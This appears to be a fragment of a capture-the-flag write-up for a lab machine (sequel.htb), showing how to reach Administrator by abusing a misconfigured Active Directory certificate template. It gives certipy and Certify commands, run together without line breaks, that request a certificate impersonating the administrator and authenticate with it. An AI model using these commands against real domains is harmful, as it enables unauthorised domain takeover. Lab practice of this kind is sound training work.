Administrator
Exploit without a shell
certipy find -u ryan.cooper -p passw -target sequel.htb -text -stdout -vulnerablecertipy-ad req -u ryan.cooper -p passw -target sequel.htb -upn [email protected] -ca sequel-DC-CA -template UserAuthenticationcertipy-ad auth -pfx administrator.pfx Exploit via shell on machine
.\Certify.exe find /vulnerable


Port 5986 (winrm) is open
Port 5986 is closed



Last updated